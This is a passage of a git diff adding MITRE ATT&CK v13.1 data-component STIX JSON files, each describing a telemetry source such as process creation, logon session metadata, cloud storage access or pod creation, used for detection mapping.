"bundle--0fcea666-08ed-4c83-b5c8-6a88f43b5c5e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json new file mode 100644 index 0000000000000000000000000000000000000000..2e6d826db41fe99c238c8237a3e587eda68e283f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--414a150e-540f-47de-8728-0271a83d8355", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json new file mode 100644 index 0000000000000000000000000000000000000000..bbb10805a9dcc720f942e2ee2de62034fb4bbab7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ef88d824-d48d-4cdd-b0f0-9d4befd44231", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3acecdde-c327-4498-9bb8-33a2e63c6c57", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Volume Deletion", + "description": "Removal of a a cloud volume (ex: AWS delete-volume)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json new file mode 100644 index 0000000000000000000000000000000000000000..84c0d3628e3066a4f005ad09c69f594335b6268d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--666d1d5c-1fac-4790-9abc-ac9b12b4bf23", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json new file mode 100644 index 0000000000000000000000000000000000000000..c755ed9cf7a64f5da32b12e11bcba01c571835a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--07877762-0806-47d2-a682-5348b8f802af", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json new file mode 100644 index 0000000000000000000000000000000000000000..9a22c480173dcf7693a5a3503236793e00469b8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f6518a1d-5d8a-4bf3-adcf-4c6d85b1d2a0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3da222e6-53f3-451c-a239-0b405c009432", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Creation", + "description": "Initial construction of a new snapshot (ex: AWS create-snapshot)", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json new file mode 100644 index 0000000000000000000000000000000000000000..3bf97ae3af632561210df9de0930623ac2eacb96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--15375ae3-a4ea-4096-8b8a-d8e0e7cc8a2a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--45977f14-1bcc-4ec4-ac14-a30fd3a11f44", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Cloud Storage Modification", + "description": "Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)", + "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json new file mode 100644 index 0000000000000000000000000000000000000000..b853e044c95acf88d9331be983a28ac596d8f681 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--62fc1325-f9cf-40e6-a3e6-2193cd283595", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Modification", + "description": "Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json new file mode 100644 index 0000000000000000000000000000000000000000..d2747100a1fb35f61c6cab8e1008e9af8dbbdeba --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--343ba7c6-3f02-4379-bd5a-354516d4da6b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--45fd904d-6eb0-4b50-8478-a961f09f898b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Metadata", + "description": "Contextual data about an instance and activity around it such as name, type, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json new file mode 100644 index 0000000000000000000000000000000000000000..ecf5c6eb1e4c285484bad158c46ba5c4da62be40 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0c24df7c-359c-4925-8ea2-33af4d10b8d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4c41e296-b8d2-4a37-b789-eb565c87c00c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Cloud Storage Deletion", + "description": "Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)", + "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json new file mode 100644 index 0000000000000000000000000000000000000000..c9f1391dfbfa3d9587332152352b9957959149b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--93e976f5-2cac-4c86-ab16-900d5fa2e005", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Modification", + "description": "Changes made to a drive letter or mount point of a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json new file mode 100644 index 0000000000000000000000000000000000000000..2c35707b318b02e6a188e58cf9125346f812a80b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d4968d83-4420-4d1c-be48-4a45c3c78231", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Pod Creation", + "description": "Initial construction of a new pod (ex: kubectl apply|run)", + "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json new file mode 100644 index 0000000000000000000000000000000000000000..4e5ef977b3b935c794fc2b6b5c2cb36982c95d9b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--c6d1a1af-5e2d-42a9-8904-14b6dd9763ce", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Creation", + "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json new file mode 100644 index 0000000000000000000000000000000000000000..f4f0b8c9d2da63c2434322a13065553766182275 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--507040a8-fa9a-409e-882f-90cbf38ca6bd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--58ef998c-f3bf-4985-b487-b1005f5c05d1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Cloud Storage Access", + "description": "Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)", + "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json new file mode 100644 index 0000000000000000000000000000000000000000..b13c3aaa676224b108e8224d519b1fc1095b97ae --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--64566dbd-50b6-4191-b4c2-857f6b7f3afb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--59ec10d9-546b-4b8e-bccb-fa85f71e5055", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Cloud Storage Creation", + "description": "Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)", + "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json new file mode 100644 index 0000000000000000000000000000000000000000..dfe7b781fdde95773989d851ce10e14d09d33cb7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7a25bbd6-0789-44be-89c6-6a66aecbc444", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5b8b466b-2c81-4fe7-946f-d677a74ae3db", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Object Modification", + "description": "Changes made to an active directory object (ex: Windows EID 5163 or 5136)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json new file mode 100644 index 0000000000000000000000000000000000000000..e37bea74e53a74bbb507a4a0b3681569020655a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--edb364e9-6cd6-455b-abfe-69e9d16679c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5c6de881-bc70-4070-855a-7a9631a407f7", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Object Access", + "description": "Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json new file mode 100644 index 0000000000000000000000000000000000000000..79f99cd3ec4be78e66b85fc68bd3be61e257fb15 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--60c0c2ba-950d-46c8-948b-39ab3533e79c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5f7c9def-0ddf-423b-b1f8-fb2ddeed0ce3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Web Credential Creation", + "description": "Initial construction of new web credential material (ex: Windows EID 1200 or 4769)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json new file mode 100644 index 0000000000000000000000000000000000000000..feffc413a7cc9ebd88fd553f1eedd7109eca31b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7ce659e6-4a5a-41f1-bf46-9a70b54c8bc4", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Container Start", + "description": "Activation or invocation of a container (ex: docker start or docker restart)", + "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json new file mode 100644 index 0000000000000000000000000000000000000000..f69526c58293a12f6eccf805d19b2c7d96b6c450 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d74e1de1-ee28-40e4-841c-f21da9cbc660", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process 